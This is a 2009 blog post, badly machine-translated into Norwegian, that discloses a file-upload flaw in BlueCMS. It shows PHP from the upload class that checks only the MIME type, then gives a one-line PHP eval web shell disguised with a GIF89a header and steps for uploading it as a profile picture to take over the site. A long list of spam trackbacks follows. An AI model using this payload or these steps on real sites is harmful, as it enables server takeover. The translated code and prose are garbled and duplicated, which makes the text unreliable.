RSS

bluecms 0day

Dette innlegget ble postet på 7 oktober 2009

: St0p
Gjengitt vennligst oppgi kilden: http://www.st0p.org

Merk: Beklager, er den versjonen av morgenen hår om natten kalt dual til avisen en 0day, informert om, og bare gå til den offisielle så på, og har gitt ut en sikkerhetsoppdatering snart ah .. du kan gå på nettet ikke en oppdatert versjon av testen ...

Akk, gruppe A venn av meg gjorde et CMS, sa brukerdata å modifisere noen kan injiseres, sa analysen, med lokalt installert etter, kan ikke bruke anførselstegn er rømt magic_quotes_gpc = off. . .

Se include / common.inc.php linje, gi opp. . 

  A
 2
 3
 4
 5
 6
 7
 8
 9

  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; Kr _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; $ _REQUEST = Deep_addslashes ($ _REQUEST);
  }
 ......

Kanskje st0p lykke, se opp bilder av deler, analyse av koden, bruker noe som finnes i user.php. . 

  A
 2
 3
 4
 5
 6

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'inkluderer / upload.class.php'); / / kaller opplastingen klassen
     new upload ( ) ; $ Bilde = ny opplastingen ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Face_pic = $ image -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Ikke finne suffiks direkte inn, vil klassen kunne passere SHELL
	 }

Åpne inkluderes / upload.class.php bare for å oppdage filhodet oppdager ikke suffikset 

  A
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } ...... Klasse upload {private $ allow_image_type = array ('image / jpg', 'image / gif', 'image / png', 'image / pjpeg'); ...... funksjon img_upload ($ fil, $ dir ='', $ imgname ='') {if (tom ($ dir)) {$ dir = BLUE_ROOT DATA Opplastingsdato ("Ym") "/";....} else {$ dir = BLUE_ROOT dataopplasting $ dir "/";..} if (file_exists ($ dir)) {if (mkdir ($ dir)!) {showmsg ('opplastingsprosessen Kunne ikke opprette katalog');}} if (tom ($ imgname)) {$ imgname = $ dette -> create_tempname () $ dette -> get_type ($ file ['navn']);.} $ imgname = $ dir $ imgname; if (in_array ($.! file ['type'], $ dette -> allow_image_type)) {/ / bare for å oppdage filhodet med, vi direkte konstruere en SHELL som en showmsg av bildet type ('ikke tillatt');}}

Ovennevnte save for st0p.php 

  A
 2

  GIF89a
 ( $_POST [ st0p ] ) ; ?> <Php eval ($ _POST [st0p]);?>

Note Network kontopåloggingen, medlem -> min profil, deretter laste det nye bildet til valget vi konstruert en PHP-fil, velg bekrefte modifisere, vise adressen er vellykket, høyreklikk på bildet direkte på linjen. . Word SHELL lastet opp!

bluecms-0day1

bluecms-0day2

Analysen er fullført, håper jeg at flere børser, spørsmålet om disse tingene bare ønsker å møte noen venner sammen for å diskutere teknologi, satt opp gruppen også, bare en vanlig gruppe, bare 100 mennesker, rydde opp, aldri snakke ble dårlig lastet B kaos T, deprimert, er åpen gruppe for utveksling, snakker ikke har vært plassholder på plass, ønsker å gå videre, kan reservert veien ikke gå!
Hvis du inn i gruppen bare for å få resultatene av diskusjoner om andre fra andre, vet ikke å betale, eller bare komme dykking, eller uten. . .

, , ,
Lær ° kampsport Juksekoder
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


79 Responses to "bluecms 0day"

  1. Av хостинг17 november 2009 | Svar

    Ja, verjetno zato je


  1. 78 Trackback (s)

  2. 8 juli 2011: Beginners Guide Blyant, Tegning
  3. 21 desember 2011: Boston Taxi
  4. 24 desember 2011: Gartnere i. Crouch End N8
  5. 25 desember 2011: anleggsgartnere London
  6. 6 januar 2012: EBook
  7. 17 januar 2012: definitive teknologi supercubeï ¿ ½ 6000
  8. 18 januar 2012: nutricion Deportiva
  9. 19 januar 2012: Whatman, utvinning fingerbøl
  10. 19 januar 2012: Tiu 1
  11. 21 januar 2012: portarollo
  12. 24 januar 2012: antykwariaty
  13. 29 januar 2012: ï »¿ Alpha Garantitjenester,
  14. 29 januar 2012: Alpha Garantitjenester
  15. 30 jan 2012: nba spådommer
  16. 30 januar 2012: Manistee bryllupsfotograf
  17. 31 januar 2012: WoF Christchurch
  18. 31 januar 2012: free porn videoer til
  19. 31 januar 2012: bodybuilding t skjorte
  20. 4 februar 2012: NFL odds
  21. 5 februar 2012: Hvor skal vedde Super Bowl 46
  22. 6 februar 2012: ryggskade
  23. 6 februar 2012: Free Classifieds
  24. 7 februar 2012: St George kiropraktor
  25. 7 februar 2012: clairvoyants Storbritannia
  26. 9 februar 2012: sportsbook betting
  27. 9 februar 2012: blodprøvetaking Tekniker
  28. 10 februar 2012: Mazda reservedeler
  29. 12 februar 2012: bil låsesmed i Port Richmond, NY
  30. 13 februar 2012: agustus
  31. 15 februar 2012: trycholog Gdynia
  32. 18 februar 2012: oljeskift kuponger
  33. 19 februar 2012: topp asiatisk sportsbook
  34. 22 februar 2012: Donald lite Bobby å dukke abonnement
  35. 22 februar 2012: Auckland drainlayer
  36. 25 februar 2012: synsk lys
  37. 26 februar 2012: Elektrik
  38. 26 februar 2012: fysioterapi assistent
  39. 1 mars 2012: bobiler verden
  40. 3 mars 2012: synske
  41. 7 mars 2012: Abdel-Malik
  42. 8 mars 2012: boliger nz
  43. 8 mars 2012: golf swing bistand
  44. 10 mars 2012: joinery auckland
  45. 12 mars 2012: synsk målinger
  46. 13 mars 2012: høner natt
  47. 14 mars 2012: Aboubakar
  48. 18 mars 2012: Online spill
  49. 19 mars 2012: Alisson
  50. 23 mars 2012: NBA Picks
  51. 23 mars 2012: gratis synsk chat
  52. 24 mars 2012: sikkerhet dører nz
  53. 27 mars 2012: fotturer butikker
  54. 29 mars 2012: hvile hjem i. auckland
  55. 30 mars 2012: Inspektører auckland
  56. 31 mars 2012: online fisk i butikken
  57. 3 april 2012: Ares, Free Download
  58. 7 april 2012: szkola jazdy Gdynia opinie
  59. 10 april 2012: antykwariaty
  60. 18 april 2012: Persienner
  61. 18 april 2012: Gratis Beats By Dre
  62. 20 april 2012: Fiji Pakker
  63. 22 april 2012: Nettstedet Marketing
  64. 22 april 2012: Treehouses
  65. 22 april 2012: Dynamic Isolering
  66. 22 april 2012: av Tribal Tatoveringer
  67. 22 april 2012: Ranking SEO Services,
  68. 22 april 2012: Supply Chain Management Course,
  69. 22 april 2012: CIA Test Prep
  70. 24 april 2012: windows auckland
  71. 24 april 2012: Chanel, klokker
  72. 3 mai 2012: bil forsikring sitater
  73. 6 mai 2012: Solar
  74. 6 mai 2012: virksomhet verdivurdering
  75. 13 mai 2012: assentient bestamp strid
  76. 17 mai 2012: Gucci Poser Outlet
  77. 18 mai 2012: Grecja niepodległa.
  78. 18 mai 2012: . Napoleon jeg jego marszałkowie Napoleon et SES Marechaux
  79. 19 mai 2012: Klikk her!

Du må være innlogget for å skrive en kommentar.